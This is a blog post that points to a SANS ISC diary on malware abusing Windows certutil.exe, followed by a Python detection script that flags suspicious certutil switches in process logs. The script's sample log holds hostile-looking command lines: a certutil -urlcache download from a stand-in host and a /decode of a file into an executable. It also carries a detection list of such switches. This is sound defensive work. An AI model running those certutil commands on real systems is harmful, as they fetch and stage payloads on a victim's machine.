[SANS ISC] A Suspicious Use of certutil.exe

I published the following diary on isc.sans.org: “A Suspicious Use of certutil.exe”:

The Microsoft operating system is full of command line tools that help to perform administrative tasks. Some can be easily installed, like the Sysinternals suite[1] and psexec.exe; others are built into Windows and available to everybody. The presence of calls to such tools can help to detect suspicious behaviours. Why reinvent the wheel, if a tool can achieve what you need? I recently upgraded my hunting rules on VirusTotal to collect samples that are (ab)using the “certutil.exe” tool… [Read more]
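As an added example (not code from the diary or from SANS ISC), the following script shows the detection idea in the excerpt: scanning process-creation events for calls to certutil.exe and flagging the ones whose command-line switches do not look like routine certificate administration. The log layout, the hostnames and the set of switches treated as suspicious are all assumptions made for this example; the switch list reflects commonly documented living-off-the-land patterns (remote fetch and base64/hex transcoding) rather than anything the diary states.

```python
import ntpath
import re

# Assumption (not from the diary): certutil switches most often reported in
# living-off-the-land abuse -- fetching remote content and transcoding payloads.
SUSPICIOUS_SWITCHES = {"-urlcache", "-decode", "-decodehex", "-encode", "-encodehex"}

# Constructed process-creation events in a simplified Sysmon-like text layout.
CONSTRUCTED_LOG = """\
2024-01-01T10:00:01Z ws01 Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -urlcache -split -f http://example.invalid/a.txt C:\\Users\\Public\\a.txt"
2024-01-01T10:00:05Z ws01 Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -store My"
2024-01-01T10:01:12Z ws02 Image=C:\\Windows\\SysWOW64\\certutil.exe CommandLine="certutil.exe /decode C:\\Temp\\p.txt C:\\Temp\\p.exe"
2024-01-01T10:02:30Z ws02 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad -urlcache"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+Image=(?P<image>\S+)\s+CommandLine="(?P<cmd>.*)"$'
)


def parse_event(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def switches_of(cmdline):
    """Return the normalised set of switches in a command line.

    certutil accepts both '-x' and '/x'; both are mapped to lowercase '-x'
    so that case or prefix variations do not evade the comparison.
    """
    out = set()
    for tok in cmdline.split():
        if tok[0] in "-/":
            out.add("-" + tok[1:].lower())
    return out


def suspicious_switches(event):
    """Suspicious switches present in a certutil.exe event (empty set otherwise).

    The image path, not the first command-line token, decides whether this is
    certutil, so a renamed first token in the command line does not matter.
    """
    if ntpath.basename(event["image"]).lower() != "certutil.exe":
        return set()
    return switches_of(event["cmd"]) & SUSPICIOUS_SWITCHES


def scan_log(text):
    """Return one hit per event whose certutil switches match the suspicious set."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        matched = suspicious_switches(ev)
        if matched:
            hits.append({
                "ts": ev["ts"],
                "host": ev["host"],
                "switches": sorted(matched),
                "cmd": ev["cmd"],
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(CONSTRUCTED_LOG):
        print(f'{hit["ts"]} {hit["host"]} {hit["switches"]}: {hit["cmd"]}')
```

On the constructed input the first and third events are reported (the `-urlcache` download and the `/decode` transcoding), while the `-store` query and the unrelated notepad process are ignored. In a real deployment the same logic would run over the EDR or Sysmon event 1 stream, and the switch set should be tuned against the organisation's own baseline of legitimate certutil use.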
